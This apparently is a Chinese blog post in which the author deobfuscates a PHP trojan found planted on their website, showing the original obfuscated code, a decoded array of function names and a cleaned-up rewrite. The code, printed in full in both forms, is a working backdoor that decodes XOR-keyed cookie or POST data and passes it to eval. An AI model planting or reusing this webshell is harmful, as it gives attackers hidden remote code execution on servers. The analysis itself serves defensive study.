一段php病毒分析

楚天乐 350 2 条

网站上被人挂了木马,拿下来分析下吧.

源代码

<?php
$wyfxfq = '0vktmocuneiy#gr9ldx1\'b_-p45H*sa8736';$hqpnhcc = Array();$hqpnhcc[] = $wyfxfq[27].$wyfxfq[28];$hqpnhcc[] = $wyfxfq[12];$hqpnhcc[] = $wyfxfq[34].$wyfxfq[15].$wyfxfq[32].$wyfxfq[19].$wyfxfq[6].$wyfxfq[9].$wyfxfq[33].$wyfxfq[21].$wyfxfq[23].$wyfxfq[34].$wyfxfq[33].$wyfxfq[30].$wyfxfq[15].$wyfxfq[23].$wyfxfq[25].$wyfxfq[26].$wyfxfq[26].$wyfxfq[31].$wyfxfq[23].$wyfxfq[15].$wyfxfq[25].$wyfxfq[31].$wyfxfq[31].$wyfxfq[23].$wyfxfq[30].$wyfxfq[15].$wyfxfq[34].$wyfxfq[30].$wyfxfq[26].$wyfxfq[33].$wyfxfq[34].$wyfxfq[0].$wyfxfq[26].$wyfxfq[21].$wyfxfq[21].$wyfxfq[25];$hqpnhcc[] = $wyfxfq[6].$wyfxfq[5].$wyfxfq[7].$wyfxfq[8].$wyfxfq[3];$hqpnhcc[] = $wyfxfq[29].$wyfxfq[3].$wyfxfq[14].$wyfxfq[22].$wyfxfq[14].$wyfxfq[9].$wyfxfq[24].$wyfxfq[9].$wyfxfq[30].$wyfxfq[3];$hqpnhcc[] = $wyfxfq[9].$wyfxfq[18].$wyfxfq[24].$wyfxfq[16].$wyfxfq[5].$wyfxfq[17].$wyfxfq[9];$hqpnhcc[] = $wyfxfq[29].$wyfxfq[7].$wyfxfq[21].$wyfxfq[29].$wyfxfq[3].$wyfxfq[14];$hqpnhcc[] = $wyfxfq[30].$wyfxfq[14].$wyfxfq[14].$wyfxfq[30].$wyfxfq[11].$wyfxfq[22].$wyfxfq[4].$wyfxfq[9].$wyfxfq[14].$wyfxfq[13].$wyfxfq[9];$hqpnhcc[] = $wyfxfq[29].$wyfxfq[3].$wyfxfq[14].$wyfxfq[16].$wyfxfq[9].$wyfxfq[8];$hqpnhcc[] = $wyfxfq[24].$wyfxfq[30].$wyfxfq[6].$wyfxfq[2];foreach ($hqpnhcc[7]($_COOKIE, $_POST) as $yzduqsm => $qwjfg){function zzukwhs($hqpnhcc, $yzduqsm, $hpuzb){return $hqpnhcc[6]($hqpnhcc[4]($yzduqsm . $hqpnhcc[2], ($hpuzb / $hqpnhcc[8]($yzduqsm)) + 1), 0, $hpuzb);}function udrbgpm($hqpnhcc, $ywknbu){return @$hqpnhcc[9]($hqpnhcc[0], $ywknbu);}function emjluei($hqpnhcc, $ywknbu){$qkmplfc = $hqpnhcc[3]($ywknbu) % 3;if (!$qkmplfc) {eval($ywknbu[1]($ywknbu[2]));exit();}}$qwjfg = udrbgpm($hqpnhcc, $qwjfg);emjluei($hqpnhcc, $hqpnhcc[5]($hqpnhcc[1], $qwjfg ^ zzukwhs($hqpnhcc, $yzduqsm, $hqpnhcc[8]($qwjfg))));}
?>

第一部分,拼接资料

<?php
// 字符集
$wyfxfq = '0vktmocuneiy#gr9ldx1\'b_-p45H*sa8736';

$hqpnhcc = Array();

// 明显是在拼接各种需要的内容
$hqpnhcc[] = $wyfxfq[27].$wyfxfq[28];
$hqpnhcc[] = $wyfxfq[12];
$hqpnhcc[] = $wyfxfq[34].$wyfxfq[15].$wyfxfq[32].$wyfxfq[19].$wyfxfq[6].$wyfxfq[9].$wyfxfq[33].$wyfxfq[21].$wyfxfq[23].$wyfxfq[34].$wyfxfq[33].$wyfxfq[30].$wyfxfq[15].$wyfxfq[23].$wyfxfq[25].$wyfxfq[26].$wyfxfq[26].$wyfxfq[31].$wyfxfq[23].$wyfxfq[15].$wyfxfq[25].$wyfxfq[31].$wyfxfq[31].$wyfxfq[23].$wyfxfq[30].$wyfxfq[15].$wyfxfq[34].$wyfxfq[30].$wyfxfq[26].$wyfxfq[33].$wyfxfq[34].$wyfxfq[0].$wyfxfq[26].$wyfxfq[21].$wyfxfq[21].$wyfxfq[25];
$hqpnhcc[] = $wyfxfq[6].$wyfxfq[5].$wyfxfq[7].$wyfxfq[8].$wyfxfq[3];
$hqpnhcc[] = $wyfxfq[29].$wyfxfq[3].$wyfxfq[14].$wyfxfq[22].$wyfxfq[14].$wyfxfq[9].$wyfxfq[24].$wyfxfq[9].$wyfxfq[30].$wyfxfq[3];
$hqpnhcc[] = $wyfxfq[9].$wyfxfq[18].$wyfxfq[24].$wyfxfq[16].$wyfxfq[5].$wyfxfq[17].$wyfxfq[9];
$hqpnhcc[] = $wyfxfq[29].$wyfxfq[7].$wyfxfq[21].$wyfxfq[29].$wyfxfq[3].$wyfxfq[14];
$hqpnhcc[] = $wyfxfq[30].$wyfxfq[14].$wyfxfq[14].$wyfxfq[30].$wyfxfq[11].$wyfxfq[22].$wyfxfq[4].$wyfxfq[9].$wyfxfq[14].$wyfxfq[13].$wyfxfq[9];
$hqpnhcc[] = $wyfxfq[29].$wyfxfq[3].$wyfxfq[14].$wyfxfq[16].$wyfxfq[9].$wyfxfq[8];
$hqpnhcc[] = $wyfxfq[24].$wyfxfq[30].$wyfxfq[6].$wyfxfq[2];

/******************** !! var_dump看下整理有什么  ************/
var_dump($hqpnhcc);
/******************** !! var_dump看下整理有什么  ************/

?>

第一处var_dump输出如下

array(10) {
  [0]=> string(2) "H*"
  [1]=> string(1) "#"
  [2]=> string(36) "6971ce3b-63a9-4558-9488-a96a53605bb4"
  [3]=> string(5) "count"
  [4]=> string(10) "str_repeat"
  [5]=> string(7) "explode"
  [6]=> string(6) "substr"
  [7]=> string(11) "array_merge"
  [8]=> string(6) "strlen"
  [9]=> string(4) "pack"
}

第二部分

<?php
foreach ($hqpnhcc[7]($_COOKIE, $_POST) as $yzduqsm => $qwjfg){
    function zzukwhs($hqpnhcc, $yzduqsm, $hpuzb){
        return $hqpnhcc[6]($hqpnhcc[4]($yzduqsm . $hqpnhcc[2], ($hpuzb / $hqpnhcc[8]($yzduqsm)) + 1), 0, $hpuzb);
    }
    function udrbgpm($hqpnhcc, $ywknbu){
        return @$hqpnhcc[9]($hqpnhcc[0], $ywknbu);
    }
    function emjluei($hqpnhcc, $ywknbu){
        $qkmplfc = $hqpnhcc[3]($ywknbu) % 3;
        if (!$qkmplfc) {
            eval($ywknbu[1]($ywknbu[2]));
            exit();
        }

    }
    $qwjfg = udrbgpm($hqpnhcc, $qwjfg);
    emjluei($hqpnhcc, $hqpnhcc[5]($hqpnhcc[1], $qwjfg ^ zzukwhs($hqpnhcc, $yzduqsm, $hqpnhcc[8]($qwjfg))));
}

重写下这段代码

  1. 对着前面数组内容翻译一下这段代码
foreach (array_merge($_COOKIE, $_POST) as $yzduqsm => $qwjfg){
    function zzukwhs($yzduqsm, $hpuzb){
        return substr(str_repeat($yzduqsm . "6971ce3b-63a9-4558-9488-a96a53605bb4", ($hpuzb / strlen($yzduqsm)) + 1), 0, $hpuzb);
    }
    function udrbgpm($ywknbu){
        return @pack("H*", $ywknbu);
    }
    function emjluei($hqpnhcc, $ywknbu){
        $qkmplfc = count($ywknbu) % 3;
        if (!$qkmplfc) {
            eval($ywknbu[1]($ywknbu[2]));
            exit();
        }

    }
    $qwjfg = udrbgpm($hqpnhcc, $qwjfg);
    emjluei($hqpnhcc, explode("#", $qwjfg ^ zzukwhs($hqpnhcc, $yzduqsm, strlen($qwjfg))));
}
  1. 替换变量名,去掉$hqpnhcc,调整结构
function zzukwhs($key, $value){
   return substr(str_repeat($key . "6971ce3b-63a9-4558-9488-a96a53605bb4", ($value / strlen($key)) + 1), 0, $value);
}

function udrbgpm($value){
   return @pack("H*", $value);
}

function emjluei($elements){
   $qkmplfc = count($elements) % 3;
   if (!$qkmplfc) {
       eval($elements[1]($elements[2]));
       exit();
   } 
}

foreach (array_merge($_COOKIE, $_POST) as $key => $value){
    $value = udrbgpm($value);
    emjluei(explode("#", $value ^ zzukwhs($key, strlen($value))));
}

打赏

微信打赏

支付宝打赏



网友最新评论( 2 )
嘿嘿

菠萝到此一游

October 17th, 2019
嘿嘿

菠萝到此一游

October 17th, 2019
发表我的评论
昵称 (必填)
邮箱 (必填)
网址